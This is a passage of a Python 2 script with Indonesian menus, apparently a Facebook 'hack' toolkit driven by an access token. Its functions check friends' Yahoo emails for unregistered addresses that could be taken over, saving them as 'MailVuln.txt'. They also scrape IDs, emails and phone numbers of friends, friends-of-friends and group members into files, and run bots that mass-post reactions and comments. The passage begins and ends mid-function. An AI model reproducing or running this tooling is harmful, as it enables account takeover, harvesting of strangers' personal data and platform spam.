menu_yahoo(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Dari teman facebook' print '\x1b[1;37;40m2. Gunakan File' print '\x1b[1;31;40m0. Kembali' print yahoo_pilih() def yahoo_pilih(): go = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if go == '': print '\x1b[1;91m[!] Jangan kosong' yahoo_pilih() else: if go == '1': yahoofriends() else: if go == '2': yahoolist() else: if go == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak ada' yahoo_pilih() def yahoofriends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' mpsh = [] jml = 0 jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') teman = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) kimak = json.loads(teman.text) save = open('MailVuln.txt', 'w') print 40 * '\x1b[1;97m\xe2\x95\x90' for w in kimak['data']: jml += 1 mpsh.append(jml) id = w['id'] nama = w['name'] links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket) z = json.loads(links.text) try: mail = z['email'] yahoo = re.compile('@.*') otw = yahoo.search(mail).group() if 'yahoo.com' in otw: br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com') br._factory.is_html = True br.select_form(nr=0) br['username'] = mail klik = br.submit().read() jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*') try: pek = jok.search(klik).group() except: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]' continue if '"messages.ERROR_INVALID_USERNAME">' in pek: save.write(mail + '\n') print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + nama print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]' print 40 * '\x1b[1;97m\xe2\x95\x90' else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]' except KeyError: pass print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt' save.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_yahoo() def yahoolist(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m') try: total = open(files, 'r') mail = total.readlines() except IOError: print '\x1b[1;91m[!] File tidak ada' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_yahoo() mpsh = [] jml = 0 jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') save = open('MailVuln.txt', 'w') print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]' print mail = open(files, 'r').readlines() for pw in mail: mail = pw.replace('\n', '') jml += 1 mpsh.append(jml) yahoo = re.compile('@.*') otw = yahoo.search(mail).group() if 'yahoo.com' in otw: br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com') br._factory.is_html = True br.select_form(nr=0) br['username'] = mail klik = br.submit().read() jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*') try: pek = jok.search(klik).group() except: print '\x1b[1;91m ' + mail continue if '"messages.ERROR_INVALID_USERNAME">' in pek: save.write(mail + '\n') print '\x1b[1;92m ' + mail else: print '\x1b[1;91m ' + mail print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt' save.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_yahoo() def grab(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Ambil ID teman' print '\x1b[1;37;40m2. Ambil ID teman dari teman' print '\x1b[1;37;40m3. Ambil ID member GRUP' print '\x1b[1;37;40m4. Ambil Email teman' print '\x1b[1;37;40m5. Ambil Email teman dari teman' print '\x1b[1;37;40m6. Ambil No HP teman' print '\x1b[1;37;40m7. Ambil No HP teman dari teman' print '\x1b[1;31;40m0. Kembali' print grab_pilih() def grab_pilih(): cuih = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if cuih == '': print '\x1b[1;91m[!] Jangan kosong' grab_pilih() else: if cuih == '1': id_teman() else: if cuih == '2': idfrom_teman() else: if cuih == '3': id_member_grup() else: if cuih == '4': email() else: if cuih == '5': emailfrom_teman() else: if cuih == '6': nomor_hp() else: if cuih == '7': hpfrom_teman() else: if cuih == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mTidak ada' grab_pilih() def id_teman(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) z = json.loads(r.text) save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') bz = open(save_id, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for ah in z['data']: idteman.append(ah['id']) bz.write(ah['id'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name'] print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id'] print 40 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idteman) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_id bz.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except KeyError: os.remove(save_id) print '\x1b[1;91m[!] Kesalahan terjadi' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def idfrom_teman(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Belum berteman' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket) z = json.loads(r.text) save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') bz = open(save_idt, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for ah in z['friends']['data']: idfromteman.append(ah['id']) bz.write(ah['id'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name'] print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id'] print 40 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idfromteman) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_idt bz.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def id_member_grup(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ') try: r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket) asw = json.loads(r.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] except KeyError: print '\x1b[1;91m[!] Grup tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') b = open(simg, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket) s = json.loads(re.text) for i in s['data']: idmem.append(i['id']) b.write(i['id'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + i['name'] print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id'] print 40 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idmem) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + simg b.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except KeyError: os.remove(simg) print '\x1b[1;91m[!] Grup tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def email(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) a = json.loads(r.text) mpsh = open(mails, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: em.append(z['email']) mpsh.write(z['email'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email'] print 40 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(em) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails mpsh.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except KeyError: os.remove(mails) print '\x1b[1;91m[!] Kesalahan terjadi' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def emailfrom_teman(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Belum berteman' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket) a = json.loads(r.text) mpsh = open(mails, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: emfromteman.append(z['email']) mpsh.write(z['email'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email'] print 40 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(emfromteman) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails mpsh.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def nomor_hp(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') url = 'https://graph.facebook.com/me/friends?access_token=' + toket r = requests.get(url) z = json.loads(r.text) no = open(noms, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for n in z['data']: x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket) z = json.loads(x.text) try: hp.append(z['mobile_phone']) no.write(z['mobile_phone'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone'] print 40 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hp) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms no.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except KeyError: os.remove(noms) print '\x1b[1;91m[!] Kesalahan terjadi' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def hpfrom_teman(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Belum berteman' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket) a = json.loads(r.text) no = open(noms, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: hpfromteman.append(z['mobile_phone']) no.write(z['mobile_phone'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone'] print 40 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hpfromteman) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms no.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def menu_bot(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Bot Reactions Target Post' print '\x1b[1;37;40m2. Bot Reactions Grup Post' print '\x1b[1;37;40m3. Bot Komen Target Post' print '\x1b[1;37;40m4. Bot Komen Grup Post' print '\x1b[1;37;40m5. Mass delete Post' print '\x1b[1;37;40m6. Terima permintaan pertemanan' print '\x1b[1;37;40m7. Hapus pertemanan' print '\x1b[1;31;40m0. Kembali' print bot_pilih() def bot_pilih(): bots = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if bots == '': print '\x1b[1;91m[!] Jangan kosong' bot_pilih() else: if bots == '1': menu_react() else: if bots == '2': grup_react() else: if bots == '3': bot_komen() else: if bots == '4': grup_komen() else: if bots == '5': deletepost() else: if bots == '6': accept() else: if bots == '7': unfriend() else: if bots == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mTidak ada' bot_pilih() def menu_react(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. \x1b[1;97mLike' print '\x1b[1;37;40m2. \x1b[1;97mLove' print '\x1b[1;37;40m3. \x1b[1;97mWow' print '\x1b[1;37;40m4. \x1b[1;97mHaha' print '\x1b[1;37;40m5. \x1b[1;97mSedih' print '\x1b[1;37;40m6. \x1b[1;97mMarah' print '\x1b[1;31;40m0. Kembali' print react_pilih() def react_pilih(): global tipe aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if aksi == '': print '\x1b[1;91m[!] Jangan kosong' react_pilih() else: if aksi == '1': tipe = 'LIKE' react() else: if aksi == '2': tipe = 'LOVE' react() else: if aksi == '3': tipe = 'WOW' react() else: if aksi == '4': tipe = 'HAHA' react() else: if aksi == '5': tipe = 'SAD' react() else: if aksi == '6': tipe = 'ANGRY' react() else: if aksi == '0': menu_bot() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada' react_pilih() def react(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') try: oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) ah = json.loads(oh.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for a in ah['feed']['data']: y = a['id'] reaksi.append(y) requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe print print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksi)) raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID Tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def grup_react(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. \x1b[1;97mLike' print '\x1b[1;37;40m2. \x1b[1;97mLove' print '\x1b[1;37;40m3. \x1b[1;97mWow' print '\x1b[1;37;40m4. \x1b[1;97mHaha' print '\x1b[1;37;40m5. \x1b[1;97mSedih' print '\x1b[1;37;40m6. \x1b[1;97mMarah' print '\x1b[1;31;40m0. Kembali' print reactg_pilih() def reactg_pilih(): global tipe aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if aksi == '': print '\x1b[1;91m[!] Jangan kosong' reactg_pilih() else: if aksi == '1': tipe = 'LIKE' reactg() else: if aksi == '2': tipe = 'LOVE' reactg() else: if aksi == '3': tipe = 'WOW' reactg() else: if aksi == '4': tipe = 'HAHA' reactg() else: if aksi == '5': tipe = 'SAD' reactg() else: if aksi == '6': tipe = 'ANGRY' reactg() else: if aksi == '0': menu_bot() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada' reactg_pilih() def reactg(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket) asw = json.loads(ah.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] try: oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) ah = json.loads(oh.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for a in ah['feed']['data']: y = a['id'] reaksigrup.append(y) requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe print print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksigrup)) raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID Tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def bot_komen(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru" ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') km = km.replace('<>', '\n') try: p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) a = json.loads(p.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for s in a['feed']['data']: f = s['id'] komen.append(f) requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]' print print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komen)) raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID Tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def grup_komen(): os.system('clear') try: toket = open('login.txt', 